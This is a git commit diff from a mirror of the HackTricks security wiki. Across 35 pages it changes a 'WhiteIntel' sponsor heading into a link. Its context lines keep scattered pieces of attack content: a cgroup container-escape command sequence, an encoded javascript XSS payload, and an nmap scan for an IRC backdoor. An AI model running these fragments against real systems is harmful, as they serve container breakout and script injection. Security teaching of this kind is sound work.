mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-24 21:53:54 +00:00
f
This commit is contained in:
parent
3290dc5aa4
commit
fe71d5c6d2
35 changed files with 66 additions and 66 deletions
|
@ -124,7 +124,7 @@ In addition to the above WebSec is also a **committed supporter of HackTricks.**
|
||||||
|
|
||||||
{% embed url="https://www.youtube.com/watch?v=Zq2JycGDCPM" %}
|
{% embed url="https://www.youtube.com/watch?v=Zq2JycGDCPM" %}
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
@ -62,7 +62,7 @@ If an attacker wants to append the string "append" he can:
|
||||||
|
|
||||||
You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
|
You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
@ -180,7 +180,7 @@ f.write(all_bytes)
|
||||||
f.close()
|
f.close()
|
||||||
```
|
```
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -1,6 +1,6 @@
|
||||||
# Threat Modeling
|
# Threat Modeling
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
@ -125,7 +125,7 @@ Now your finished model should look something like this. And this is how you mak
|
||||||
This is a free tool from Microsoft that helps in finding threats in the design phase of software projects. It uses the STRIDE methodology and is particularly suitable for those developing on Microsoft's stack.
|
This is a free tool from Microsoft that helps in finding threats in the design phase of software projects. It uses the STRIDE methodology and is particularly suitable for those developing on Microsoft's stack.
|
||||||
|
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
@ -303,7 +303,7 @@ These shortcuts are for the visual settings and sound settings, depending on the
|
||||||
* [http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html](http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html)
|
* [http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html](http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html)
|
||||||
|
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
@ -79,7 +79,7 @@ In a setup with multiple auth modules, the process follows a strict order. If th
|
||||||
* [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434)
|
* [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434)
|
||||||
|
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
@ -320,7 +320,7 @@ chmod +x /tmp/test.pl
|
||||||
/tmp/test.pl
|
/tmp/test.pl
|
||||||
```
|
```
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
@ -85,7 +85,7 @@ chmod a+x /cmd
|
||||||
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
|
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
|
||||||
```
|
```
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
@ -148,7 +148,7 @@ If **apple** is indicated in the **partitionID**, you could access it with **`os
|
||||||
|
|
||||||
* [**#OBTS v5.0: "Lock Picking the macOS Keychain" - Cody Thomas**](https://www.youtube.com/watch?v=jKE1ZW33JpY)
|
* [**#OBTS v5.0: "Lock Picking the macOS Keychain" - Cody Thomas**](https://www.youtube.com/watch?v=jKE1ZW33JpY)
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
@ -80,7 +80,7 @@ cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-
|
||||||
```
|
```
|
||||||
{% endcode %}
|
{% endcode %}
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
@ -72,7 +72,7 @@ Android apps can use native libraries, typically written in C or C++, for perfor
|
||||||
- [Debug Android Native Libraries Using JEB Decompiler](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
|
- [Debug Android Native Libraries Using JEB Decompiler](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
|
||||||
|
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
@ -392,7 +392,7 @@ iOS only stores 25 crashes of the same app, so you need to clean that or iOS wil
|
||||||
* [https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida](https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida)
|
* [https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida](https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida)
|
||||||
|
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
@ -150,7 +150,7 @@ Every MQTT packet contains a fixed header (Figure 02).Figure 02: Fixed Header
|
||||||
|
|
||||||
* `port:1883 MQTT`
|
* `port:1883 MQTT`
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
@ -363,7 +363,7 @@ You can use auditd to monitor docker.
|
||||||
* [https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc)
|
* [https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc)
|
||||||
|
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
@ -108,7 +108,7 @@ nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,66
|
||||||
* `looking up your hostname`
|
* `looking up your hostname`
|
||||||
|
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
@ -120,7 +120,7 @@ SDP's simplicity and flexibility make it a widely adopted standard for describin
|
||||||
|
|
||||||
These protocols play essential roles in **delivering and securing real-time multimedia communication over IP networks**. While RTP and RTCP handle the actual media transmission and quality monitoring, SRTP and ZRTP ensure that the transmitted media is protected against eavesdropping, tampering, and replay attacks.
|
These protocols play essential roles in **delivering and securing real-time multimedia communication over IP networks**. While RTP and RTCP handle the actual media transmission and quality monitoring, SRTP and ZRTP ensure that the transmitted media is protected against eavesdropping, tampering, and replay attacks.
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
@ -349,7 +349,7 @@ npm start
|
||||||
* More researches and write-ups about Electron security in [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking)
|
* More researches and write-ups about Electron security in [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking)
|
||||||
* [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)
|
* [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
@ -298,7 +298,7 @@ HTTP/1.1 401 Unauthorized
|
||||||
HTTP/1.1 200 OK
|
HTTP/1.1 200 OK
|
||||||
```
|
```
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
@ -146,7 +146,7 @@ Utilizing decoy requests to obfuscate brute force attempts or mislead rate limit
|
||||||
* [https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718](https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718)
|
* [https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718](https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718)
|
||||||
|
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
@ -111,7 +111,7 @@ javascript:alert(1)%252f%252f..%252fcss-images
|
||||||
|
|
||||||
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
|
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
@ -149,7 +149,7 @@ You could definitely use it in a bug **chain** to exploit a **prototype pollutio
|
||||||
* [https://portswigger.net/research/server-side-prototype-pollution](https://portswigger.net/research/server-side-prototype-pollution)
|
* [https://portswigger.net/research/server-side-prototype-pollution](https://portswigger.net/research/server-side-prototype-pollution)
|
||||||
|
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
@ -66,7 +66,7 @@ However, there is a check in the web server that **prevents loading files that c
|
||||||
|
|
||||||
For more information check the description of the Race Condition and the CTF in [https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)
|
For more information check the description of the Race Condition and the CTF in [https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
@ -308,7 +308,7 @@ if __name__ == "__main__":
|
||||||
|
|
||||||
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
|
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -16,7 +16,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
@ -246,7 +246,7 @@ For **more information**:
|
||||||
* [https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd](https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd)
|
* [https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd](https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd)
|
||||||
* To practice: [https://github.com/yavolo/eventlistener-xss-recon](https://github.com/yavolo/eventlistener-xss-recon)
|
* To practice: [https://github.com/yavolo/eventlistener-xss-recon](https://github.com/yavolo/eventlistener-xss-recon)
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
@ -206,7 +206,7 @@ JSON Web Token might be used to authenticate an user.
|
||||||
* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)
|
* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)
|
||||||
|
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
@ -272,7 +272,7 @@ Check [https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/](https://
|
||||||
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools)
|
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools)
|
||||||
